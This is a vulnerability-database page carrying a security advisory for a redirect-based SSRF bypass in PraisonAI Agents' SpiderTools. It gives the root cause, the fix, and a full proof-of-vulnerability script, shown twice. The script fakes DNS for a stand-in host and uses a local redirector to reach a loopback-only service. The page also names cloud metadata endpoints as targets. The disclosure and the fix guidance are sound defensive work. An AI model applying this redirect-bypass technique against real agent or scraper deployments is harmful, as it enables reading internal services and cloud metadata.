# SpiderTools redirect-target SSRF protection bypass ## Summary `SpiderTools.scrape_page()` validates the initial URL and rejects direct loopback, private, link-local, metadata, and internal hostnames. It then calls `requests.Session.get()` without disabling automatic redirects or validating...
Full CISO analysis pending enrichment.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI Agents | pip | <= 1.6.58 | 1.6.59 |
Do you use PraisonAI Agents? You're affected.
How severe is it?
What is the attack surface?
What should I do?
Patch available
Update PraisonAI Agents to version 1.6.59
Which compliance frameworks are affected?
Compliance analysis pending. Sign in for full compliance mapping when available.
Frequently Asked Questions
What is GHSA-6h9p-93hq-q7h6?
# SpiderTools redirect-target SSRF protection bypass ## Summary `SpiderTools.scrape_page()` validates the initial URL and rejects direct loopback, private, link-local, metadata, and internal hostnames. It then calls `requests.Session.get()` without disabling automatic redirects or validating redirect `Location` targets. Requests follows redirects by default for GET requests. A safe-looking public URL can therefore pass `_validate_url()`, redirect to a blocked target such as `127.0.0.1` or `169.254.169.254`, and have the redirected response body parsed and returned by `scrape_page()`. The same sink is used by `extract_links()`, `crawl()`, and `extract_text()` through their calls to `scrape_page()`. ## Affected component ```text src/praisonai-agents/praisonaiagents/tools/spider_tools.py ``` Tested affected: - `v3.9.24` / `d08d98ca` - `v3.9.26` / `62472a23` - `v4.6.56` / `d3c4a2af` - `v4.6.57` / `e90d92231853161ad931f3498da57651a9f8b528` - current main `2f9677abb2ea68eab864ee8b6a828fd0141612e1` No patched version is known at report time. ## Root cause Current main validates only the caller-supplied URL: ```python if not self._validate_url(url): return {"error": f"Invalid or potentially dangerous URL: {url}"} ``` The fetch then uses Requests defaults: ```python response = session.get( url, timeout=timeout, verify=verify_ssl ) ``` Because `allow_redirects=False` is not set, Requests follows a 3xx redirect to a new destination that has not been checked by `_validate_url()` or `_host_is_blocked()`. ## Proof of vulnerability The PoV below is local-only and does not contact external infrastructure. It starts a loopback-only internal service and a local redirector. During PraisonAI's initial host validation, `attacker.test` is made to look like a public address. During the actual HTTP request, it routes to the local redirector, which returns `302 Location: http://127.0.0.1:<port>/secret`. Full PoV: ```python #!/usr/bin/env python3 """Local PoV for SpiderTools redirect-target SSRF. This uses only loopback services. The "attacker" hostname is treated as public during PraisonAI's initial URL validation, then routed to a local redirector so the PoV does not contact external infrastructure. The redirector points at a loopback-only internal service. Vulnerable behavior is confirmed when SpiderTools follows that redirect and returns the internal response body. """ from __future__ import annotations import http.server import importlib.util import inspect import os import socket import socketserver import threading from typing import Any def _load_spider_tools_class(): module_file = os.environ.get("PRAISONAI_SPIDER_TOOLS_FILE") if module_file: spec = importlib.util.spec_from_file_location("pov_spider_tools", module_file) if spec is None or spec.loader is None: raise RuntimeError(f"Could not load spider_tools file: {module_file}") module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) return module.SpiderTools from praisonaiagents.tools.spider_tools import SpiderTools return SpiderTools class InternalHandler(http.server.BaseHTTPRequestHandler): body = b"SPIDER-INTERNAL-SECRET" def do_GET(self) -> None: # noqa: N802 self.server.hit = True # type: ignore[attr-defined] self.send_response(200) self.send_header("Content-Type", "text/html") self.send_header("Content-Length", str(len(self.body))) self.end_headers() self.wfile.write(self.body) def log_message(self, *_args: Any) -> None: return class RedirectHandler(http.server.BaseHTTPRequestHandler): target = "" def do_GET(self) -> None: # noqa: N802 self.server.hit = True # type: ignore[attr-defined] self.send_response(302) self.send_header("Location", self.target) self.end_headers() def log_message(self, *_args: Any) -> None: return def _called_from_spider_host_guard() -> bool: return any(frame.function == "_host_is_blocked" for frame in inspect.stack()) def main() -> int: os.environ.pop("ALLOW_LOCAL_CRAWL", None) internal = socketserver.TCPServer(("127.0.0.1", 0), InternalHandler) internal.hit = False # type: ignore[attr-defined] internal_port = internal.server_address[1] RedirectHandler.target = f"http://127.0.0.1:{internal_port}/secret" redirect = socketserver.TCPServer(("127.0.0.1", 0), RedirectHandler) redirect.hit = False # type: ignore[attr-defined] redirect_port = redirect.server_address[1] threading.Thread(target=internal.serve_forever, daemon=True).start() threading.Thread(target=redirect.serve_forever, daemon=True).start() original_getaddrinfo = socket.getaddrinfo def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any): if host == "attacker.test": if _called_from_spider_host_guard(): return [ ( socket.AF_INET, socket.SOCK_STREAM, 6, "", ("93.184.216.34", port), ) ] return original_getaddrinfo("127.0.0.1", port, *args, **kwargs) return original_getaddrinfo(host, port, *args, **kwargs) tool = _load_spider_tools_class()() socket.getaddrinfo = fake_getaddrinfo try: direct_control = tool.scrape_page( f"http://127.0.0.1:{internal_port}/secret", timeout=5, ) redirect_result = tool.scrape_page( f"http://attacker.test:{redirect_port}/go", timeout=5, ) vulnerable_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined] vulnerable_internal_hit = bool(internal.hit) # type: ignore[attr-defined] redirect.hit = False # type: ignore[attr-defined] internal.hit = False # type: ignore[attr-defined] import requests original_session_get = requests.Session.get def no_redirect_get(self, url, **kwargs): # type: ignore[no-untyped-def] kwargs.setdefault("allow_redirects", False) return original_session_get(self, url, **kwargs) requests.Session.get = no_redirect_get try: no_redirect_control = _load_spider_tools_class()().scrape_page( f"http://attacker.test:{redirect_port}/go", timeout=5, ) finally: requests.Session.get = original_session_get no_redirect_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined] no_redirect_internal_hit = bool(internal.hit) # type: ignore[attr-defined] finally: socket.getaddrinfo = original_getaddrinfo redirect.shutdown() internal.shutdown() redirect.server_close() internal.server_close() print("DIRECT_CONTROL:", direct_control) print("REDIRECT_RESULT:", redirect_result) print("REDIRECT_SERVER_HIT:", vulnerable_redirect_hit) print("INTERNAL_SERVER_HIT:", vulnerable_internal_hit) print("NO_REDIRECT_CONTROL:", no_redirect_control) print("NO_REDIRECT_SERVER_HIT:", no_redirect_redirect_hit) print("NO_REDIRECT_INTERNAL_HIT:", no_redirect_internal_hit) if not isinstance(direct_control, dict) or "dangerous URL" not in str(direct_control): raise SystemExit("control failed: direct loopback was not blocked") if not isinstance(redirect_result, dict) or "error" in redirect_result: raise SystemExit(f"bypass failed: unexpected result {redirect_result!r}") if "SPIDER-INTERNAL-SECRET" not in str(redirect_result.get("content", "")): raise SystemExit("bypass failed: internal body was not returned") if not vulnerable_redirect_hit or not vulnerable_internal_hit: raise SystemExit("bypass failed: expected local servers were not hit") if not no_redirect_redirect_hit or no_redirect_internal_hit: raise SystemExit("fix control failed: no-redirect mode reached internal service") print("PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback") return 0 if __name__ == "__main__": raise SystemExit(main()) ``` Run: ```fish cd /Users/rexliu/Documents/GA\ code/REDit\ Deployment/stack/deploy env PRAISONAI_SPIDER_TOOLS_FILE=/path/to/PraisonAI/src/praisonai-agents/praisonaiagents/tools/spider_tools.py \ uv run --with requests --with beautifulsoup4 --with lxml --python 3.11 \ poc_spider_tools_redirect_ssrf.py ``` Observed on current main: ```text DIRECT_CONTROL: {'error': 'Invalid or potentially dangerous URL: http://127.0.0.1:<port>/secret'} REDIRECT_RESULT: {'url': 'http://attacker.test:<port>/go', 'status_code': 200, ... 'content': 'SPIDER-INTERNAL-SECRET', ...} REDIRECT_SERVER_HIT: True INTERNAL_SERVER_HIT: True NO_REDIRECT_CONTROL: {'url': 'http://attacker.test:<port>/go', 'status_code': 302, ... 'Location': 'http://127.0.0.1:<port>/secret', ...} NO_REDIRECT_SERVER_HIT: True NO_REDIRECT_INTERNAL_HIT: False PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback ``` The direct control proves direct loopback is blocked. The redirect result proves the same blocked destination is reached through a public-looking initial URL. The no-redirect control proves that disabling automatic redirects prevents the internal request while still receiving the external redirect response. ## Why this is not intended behavior The Spider Tools documentation says `scrape_page`, `extract_links`, `crawl`, and `extract_text` refuse dangerous URLs before network requests. The documented blocked classes include loopback, private/reserved IPs, link-local/cloud metadata endpoints, internal TLDs, non-HTTP(S) schemes, and parser-smuggling forms. The same page states the validation is always on for bundled spider tools and does not require `enable_security()`. The current code also documents `_validate_url()` as URL validation "to prevent SSRF attacks." A redirect to a loopback target bypasses that documented protection. ## Impact An attacker who can influence a URL passed to `scrape_page()`, `extract_links()`, `crawl()`, or `extract_text()` can cause the PraisonAI process to request destinations that SpiderTools is designed to block. Potential impact includes: - reading loopback-only HTTP services; - probing or reading private network services reachable from the PraisonAI host; - reading link-local/cloud metadata endpoints if reachable in the deployment environment. The PoV demonstrates returned response-body disclosure from a loopback-only service. This report does not claim arbitrary code execution or live cloud credential theft without deployment-specific evidence. ## Severity Suggested default severity: Moderate. High severity may be appropriate for deployments where untrusted users can directly invoke SpiderTools through a network-facing agent, bot, API, or MCP service and sensitive internal or metadata services are reachable. ## Suggested fix Disable automatic redirects in `scrape_page()`: ```python response = session.get( url, timeout=timeout, verify=verify_ssl, allow_redirects=False, ) ``` If redirects should remain supported, follow them manually and validate every `Location` target before each hop using the same SSRF guard: - require `http` or `https`; - resolve and validate every redirect hostname; - reject loopback, private, link-local, reserved, multicast, unspecified, internal, and metadata destinations; - cap redirect count; - apply the same safe fetch path to `scrape_page()`, `extract_links()`, `crawl()`, and `extract_text()`. Regression tests should cover direct loopback rejection, public-to-loopback redirect rejection, public-to-public redirects if supported, and all `scrape_page()` callers.
Is GHSA-6h9p-93hq-q7h6 actively exploited?
No confirmed active exploitation of GHSA-6h9p-93hq-q7h6 has been reported, but organizations should still patch proactively.
How to fix GHSA-6h9p-93hq-q7h6?
Update to patched version: PraisonAI Agents 1.6.59.
What is the CVSS score for GHSA-6h9p-93hq-q7h6?
GHSA-6h9p-93hq-q7h6 has a CVSS v3.1 base score of 6.5 (MEDIUM).
What are the technical details?
Original Advisory
# SpiderTools redirect-target SSRF protection bypass ## Summary `SpiderTools.scrape_page()` validates the initial URL and rejects direct loopback, private, link-local, metadata, and internal hostnames. It then calls `requests.Session.get()` without disabling automatic redirects or validating redirect `Location` targets. Requests follows redirects by default for GET requests. A safe-looking public URL can therefore pass `_validate_url()`, redirect to a blocked target such as `127.0.0.1` or `169.254.169.254`, and have the redirected response body parsed and returned by `scrape_page()`. The same sink is used by `extract_links()`, `crawl()`, and `extract_text()` through their calls to `scrape_page()`. ## Affected component ```text src/praisonai-agents/praisonaiagents/tools/spider_tools.py ``` Tested affected: - `v3.9.24` / `d08d98ca` - `v3.9.26` / `62472a23` - `v4.6.56` / `d3c4a2af` - `v4.6.57` / `e90d92231853161ad931f3498da57651a9f8b528` - current main `2f9677abb2ea68eab864ee8b6a828fd0141612e1` No patched version is known at report time. ## Root cause Current main validates only the caller-supplied URL: ```python if not self._validate_url(url): return {"error": f"Invalid or potentially dangerous URL: {url}"} ``` The fetch then uses Requests defaults: ```python response = session.get( url, timeout=timeout, verify=verify_ssl ) ``` Because `allow_redirects=False` is not set, Requests follows a 3xx redirect to a new destination that has not been checked by `_validate_url()` or `_host_is_blocked()`. ## Proof of vulnerability The PoV below is local-only and does not contact external infrastructure. It starts a loopback-only internal service and a local redirector. During PraisonAI's initial host validation, `attacker.test` is made to look like a public address. During the actual HTTP request, it routes to the local redirector, which returns `302 Location: http://127.0.0.1:<port>/secret`. Full PoV: ```python #!/usr/bin/env python3 """Local PoV for SpiderTools redirect-target SSRF. This uses only loopback services. The "attacker" hostname is treated as public during PraisonAI's initial URL validation, then routed to a local redirector so the PoV does not contact external infrastructure. The redirector points at a loopback-only internal service. Vulnerable behavior is confirmed when SpiderTools follows that redirect and returns the internal response body. """ from __future__ import annotations import http.server import importlib.util import inspect import os import socket import socketserver import threading from typing import Any def _load_spider_tools_class(): module_file = os.environ.get("PRAISONAI_SPIDER_TOOLS_FILE") if module_file: spec = importlib.util.spec_from_file_location("pov_spider_tools", module_file) if spec is None or spec.loader is None: raise RuntimeError(f"Could not load spider_tools file: {module_file}") module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) return module.SpiderTools from praisonaiagents.tools.spider_tools import SpiderTools return SpiderTools class InternalHandler(http.server.BaseHTTPRequestHandler): body = b"SPIDER-INTERNAL-SECRET" def do_GET(self) -> None: # noqa: N802 self.server.hit = True # type: ignore[attr-defined] self.send_response(200) self.send_header("Content-Type", "text/html") self.send_header("Content-Length", str(len(self.body))) self.end_headers() self.wfile.write(self.body) def log_message(self, *_args: Any) -> None: return class RedirectHandler(http.server.BaseHTTPRequestHandler): target = "" def do_GET(self) -> None: # noqa: N802 self.server.hit = True # type: ignore[attr-defined] self.send_response(302) self.send_header("Location", self.target) self.end_headers() def log_message(self, *_args: Any) -> None: return def _called_from_spider_host_guard() -> bool: return any(frame.function == "_host_is_blocked" for frame in inspect.stack()) def main() -> int: os.environ.pop("ALLOW_LOCAL_CRAWL", None) internal = socketserver.TCPServer(("127.0.0.1", 0), InternalHandler) internal.hit = False # type: ignore[attr-defined] internal_port = internal.server_address[1] RedirectHandler.target = f"http://127.0.0.1:{internal_port}/secret" redirect = socketserver.TCPServer(("127.0.0.1", 0), RedirectHandler) redirect.hit = False # type: ignore[attr-defined] redirect_port = redirect.server_address[1] threading.Thread(target=internal.serve_forever, daemon=True).start() threading.Thread(target=redirect.serve_forever, daemon=True).start() original_getaddrinfo = socket.getaddrinfo def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any): if host == "attacker.test": if _called_from_spider_host_guard(): return [ ( socket.AF_INET, socket.SOCK_STREAM, 6, "", ("93.184.216.34", port), ) ] return original_getaddrinfo("127.0.0.1", port, *args, **kwargs) return original_getaddrinfo(host, port, *args, **kwargs) tool = _load_spider_tools_class()() socket.getaddrinfo = fake_getaddrinfo try: direct_control = tool.scrape_page( f"http://127.0.0.1:{internal_port}/secret", timeout=5, ) redirect_result = tool.scrape_page( f"http://attacker.test:{redirect_port}/go", timeout=5, ) vulnerable_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined] vulnerable_internal_hit = bool(internal.hit) # type: ignore[attr-defined] redirect.hit = False # type: ignore[attr-defined] internal.hit = False # type: ignore[attr-defined] import requests original_session_get = requests.Session.get def no_redirect_get(self, url, **kwargs): # type: ignore[no-untyped-def] kwargs.setdefault("allow_redirects", False) return original_session_get(self, url, **kwargs) requests.Session.get = no_redirect_get try: no_redirect_control = _load_spider_tools_class()().scrape_page( f"http://attacker.test:{redirect_port}/go", timeout=5, ) finally: requests.Session.get = original_session_get no_redirect_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined] no_redirect_internal_hit = bool(internal.hit) # type: ignore[attr-defined] finally: socket.getaddrinfo = original_getaddrinfo redirect.shutdown() internal.shutdown() redirect.server_close() internal.server_close() print("DIRECT_CONTROL:", direct_control) print("REDIRECT_RESULT:", redirect_result) print("REDIRECT_SERVER_HIT:", vulnerable_redirect_hit) print("INTERNAL_SERVER_HIT:", vulnerable_internal_hit) print("NO_REDIRECT_CONTROL:", no_redirect_control) print("NO_REDIRECT_SERVER_HIT:", no_redirect_redirect_hit) print("NO_REDIRECT_INTERNAL_HIT:", no_redirect_internal_hit) if not isinstance(direct_control, dict) or "dangerous URL" not in str(direct_control): raise SystemExit("control failed: direct loopback was not blocked") if not isinstance(redirect_result, dict) or "error" in redirect_result: raise SystemExit(f"bypass failed: unexpected result {redirect_result!r}") if "SPIDER-INTERNAL-SECRET" not in str(redirect_result.get("content", "")): raise SystemExit("bypass failed: internal body was not returned") if not vulnerable_redirect_hit or not vulnerable_internal_hit: raise SystemExit("bypass failed: expected local servers were not hit") if not no_redirect_redirect_hit or no_redirect_internal_hit: raise SystemExit("fix control failed: no-redirect mode reached internal service") print("PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback") return 0 if __name__ == "__main__": raise SystemExit(main()) ``` Run: ```fish cd /Users/rexliu/Documents/GA\ code/REDit\ Deployment/stack/deploy env PRAISONAI_SPIDER_TOOLS_FILE=/path/to/PraisonAI/src/praisonai-agents/praisonaiagents/tools/spider_tools.py \ uv run --with requests --with beautifulsoup4 --with lxml --python 3.11 \ poc_spider_tools_redirect_ssrf.py ``` Observed on current main: ```text DIRECT_CONTROL: {'error': 'Invalid or potentially dangerous URL: http://127.0.0.1:<port>/secret'} REDIRECT_RESULT: {'url': 'http://attacker.test:<port>/go', 'status_code': 200, ... 'content': 'SPIDER-INTERNAL-SECRET', ...} REDIRECT_SERVER_HIT: True INTERNAL_SERVER_HIT: True NO_REDIRECT_CONTROL: {'url': 'http://attacker.test:<port>/go', 'status_code': 302, ... 'Location': 'http://127.0.0.1:<port>/secret', ...} NO_REDIRECT_SERVER_HIT: True NO_REDIRECT_INTERNAL_HIT: False PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback ``` The direct control proves direct loopback is blocked. The redirect result proves the same blocked destination is reached through a public-looking initial URL. The no-redirect control proves that disabling automatic redirects prevents the internal request while still receiving the external redirect response. ## Why this is not intended behavior The Spider Tools documentation says `scrape_page`, `extract_links`, `crawl`, and `extract_text` refuse dangerous URLs before network requests. The documented blocked classes include loopback, private/reserved IPs, link-local/cloud metadata endpoints, internal TLDs, non-HTTP(S) schemes, and parser-smuggling forms. The same page states the validation is always on for bundled spider tools and does not require `enable_security()`. The current code also documents `_validate_url()` as URL validation "to prevent SSRF attacks." A redirect to a loopback target bypasses that documented protection. ## Impact An attacker who can influence a URL passed to `scrape_page()`, `extract_links()`, `crawl()`, or `extract_text()` can cause the PraisonAI process to request destinations that SpiderTools is designed to block. Potential impact includes: - reading loopback-only HTTP services; - probing or reading private network services reachable from the PraisonAI host; - reading link-local/cloud metadata endpoints if reachable in the deployment environment. The PoV demonstrates returned response-body disclosure from a loopback-only service. This report does not claim arbitrary code execution or live cloud credential theft without deployment-specific evidence. ## Severity Suggested default severity: Moderate. High severity may be appropriate for deployments where untrusted users can directly invoke SpiderTools through a network-facing agent, bot, API, or MCP service and sensitive internal or metadata services are reachable. ## Suggested fix Disable automatic redirects in `scrape_page()`: ```python response = session.get( url, timeout=timeout, verify=verify_ssl, allow_redirects=False, ) ``` If redirects should remain supported, follow them manually and validate every `Location` target before each hop using the same SSRF guard: - require `http` or `https`; - resolve and validate every redirect hostname; - reject loopback, private, link-local, reserved, multicast, unspecified, internal, and metadata destinations; - cap redirect count; - apply the same safe fetch path to `scrape_page()`, `extract_links()`, `crawl()`, and `extract_text()`. Regression tests should cover direct loopback rejection, public-to-loopback redirect rejection, public-to-public redirects if supported, and all `scrape_page()` callers.
Weaknesses (CWE)
CWE-918 — Server-Side Request Forgery (SSRF): The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N References
Timeline
Related Vulnerabilities
CVE-2026-39888 10.0 praisonaiagents: sandbox escape enables host RCE
Same package: praisonaiagents CVE-2026-34938 10.0 praisonaiagents: sandbox bypass enables full host RCE
Same package: praisonaiagents CVE-2026-47392 9.9 praisonaiagents: RCE via Python sandbox bypass
Same package: praisonaiagents GHSA-vc46-vw85-3wvm 9.8 PraisonAI: RCE via malicious workflow YAML execution
Same package: praisonaiagents CVE-2026-47391 9.8 PraisonAI: Unauth RCE via A2A eval injection
Same package: praisonaiagents